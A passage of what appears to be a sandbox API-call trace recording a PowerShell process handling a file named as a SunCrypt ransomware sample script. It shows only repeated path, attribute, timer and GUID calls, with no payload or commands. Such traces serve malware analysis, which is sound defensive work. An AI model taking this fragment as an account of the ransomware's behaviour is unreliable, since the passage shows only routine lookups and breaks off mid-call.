ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.140] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.140] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.144] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701696029553) returned 1 [0104.144] EtwEventActivityIdControl () returned 0x0 [0104.144] EtwEventActivityIdControl () returned 0x0 [0104.144] EtwEventActivityIdControl () returned 0x0 [0104.144] EtwEventActivityIdControl () returned 0x0 [0104.144] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xaa9586c3, Data2=0x9089, Data3=0x4cd6, Data4=([0]=0xa7, [1]=0x88, [2]=0x22, [3]=0xfd, [4]=0xdd, [5]=0xc5, [6]=0x39, [7]=0x5c))) returned 0x0 [0104.145] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.145] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701696140864) returned 1 [0104.145] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.145] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.145] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.145] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.145] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.147] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701696380111) returned 1 [0104.147] EtwEventActivityIdControl () returned 0x0 [0104.147] EtwEventActivityIdControl () returned 0x0 [0104.147] EtwEventActivityIdControl () returned 0x0 [0104.147] EtwEventActivityIdControl () returned 0x0 [0104.148] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x40d40333, Data2=0xfc3e, Data3=0x4c31, Data4=([0]=0xbd, [1]=0xf8, [2]=0x76, [3]=0x50, [4]=0xac, [5]=0x13, [6]=0xdd, [7]=0xc0))) returned 0x0 [0104.148] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.148] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701696481059) returned 1 [0104.148] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.148] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.148] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.149] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.149] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.150] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701696707080) returned 1 [0104.151] EtwEventActivityIdControl () returned 0x0 [0104.151] EtwEventActivityIdControl () returned 0x0 [0104.151] EtwEventActivityIdControl () returned 0x0 [0104.151] EtwEventActivityIdControl () returned 0x0 [0104.151] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x7bf0d212, Data2=0x204b, Data3=0x4eeb, Data4=([0]=0x8b, [1]=0x89, [2]=0x77, [3]=0x88, [4]=0x80, [5]=0x5e, [6]=0x71, [7]=0x5b))) returned 0x0 [0104.151] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.152] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701696820743) returned 1 [0104.152] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.152] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.152] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.152] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.152] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.156] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701697311058) returned 1 [0104.157] EtwEventActivityIdControl () returned 0x0 [0104.157] EtwEventActivityIdControl () returned 0x0 [0104.157] EtwEventActivityIdControl () returned 0x0 [0104.157] EtwEventActivityIdControl () returned 0x0 [0104.157] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x15327e36, Data2=0x254e, Data3=0x4af6, Data4=([0]=0xb7, [1]=0xab, [2]=0x44, [3]=0xdc, [4]=0xf, [5]=0x73, [6]=0xd, [7]=0x31))) returned 0x0 [0104.157] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.158] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701697439764) returned 1 [0104.158] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.158] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.158] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.158] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.158] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.158] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.162] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701697907964) returned 1 [0104.163] EtwEventActivityIdControl () returned 0x0 [0104.163] EtwEventActivityIdControl () returned 0x0 [0104.163] EtwEventActivityIdControl () returned 0x0 [0104.163] EtwEventActivityIdControl () returned 0x0 [0104.163] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xe16115f0, Data2=0xf22c, Data3=0x4463, Data4=([0]=0x82, [1]=0x9d, [2]=0xd1, [3]=0x45, [4]=0xb6, [5]=0xa, [6]=0xd4, [7]=0xe3))) returned 0x0 [0104.164] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.164] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701698046496) returned 1 [0104.164] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.164] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.164] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.164] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.164] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.164] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.169] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701698565698) returned 1 [0104.169] EtwEventActivityIdControl () returned 0x0 [0104.169] EtwEventActivityIdControl () returned 0x0 [0104.169] EtwEventActivityIdControl () returned 0x0 [0104.170] EtwEventActivityIdControl () returned 0x0 [0104.170] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x4e1c020, Data2=0x9d30, Data3=0x4d5b, Data4=([0]=0xa8, [1]=0x30, [2]=0x3a, [3]=0x10, [4]=0xf1, [5]=0xbc, [6]=0x90, [7]=0x4b))) returned 0x0 [0104.170] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.170] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701698706165) returned 1 [0104.171] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.171] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.171] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.171] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.171] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.171] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.171] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.172] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701698907978) returned 1 [0104.173] EtwEventActivityIdControl () returned 0x0 [0104.173] EtwEventActivityIdControl () returned 0x0 [0104.173] EtwEventActivityIdControl () returned 0x0 [0104.173] EtwEventActivityIdControl () returned 0x0 [0104.173] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xfc6e9e3a, Data2=0xf28a, Data3=0x4685, Data4=([0]=0xa5, [1]=0x4a, [2]=0x4a, [3]=0x36, [4]=0x4c, [5]=0x57, [6]=0x7f, [7]=0x5))) returned 0x0 [0104.174] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.174] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701699758101) returned 1 [0104.182] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.182] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.182] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.182] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.182] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.182] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.185] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701700128126) returned 1 [0104.185] EtwEventActivityIdControl () returned 0x0 [0104.185] EtwEventActivityIdControl () returned 0x0 [0104.185] EtwEventActivityIdControl () returned 0x0 [0104.185] EtwEventActivityIdControl () returned 0x0 [0104.185] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x2b89b37b, Data2=0xd463, Data3=0x49fc, Data4=([0]=0x94, [1]=0xe8, [2]=0x9, [3]=0x90, [4]=0x3, [5]=0x94, [6]=0x9a, [7]=0xd))) returned 0x0 [0104.186] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.186] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701700275235) returned 1 [0104.186] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.186] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.186] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.186] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.187] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.187] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.188] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701700458694) returned 1 [0104.188] EtwEventActivityIdControl () returned 0x0 [0104.188] EtwEventActivityIdControl () returned 0x0 [0104.188] EtwEventActivityIdControl () returned 0x0 [0104.188] EtwEventActivityIdControl () returned 0x0 [0104.188] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xf284c10f, Data2=0x89b7, Data3=0x4d85, Data4=([0]=0x9c, [1]=0x9f, [2]=0xf2, [3]=0xc5, [4]=0xfb, [5]=0x36, [6]=0x86, [7]=0x23))) returned 0x0 [0104.189] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.190] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701700626335) returned 1 [0104.190] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.190] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.190] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.190] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.190] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.190] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: 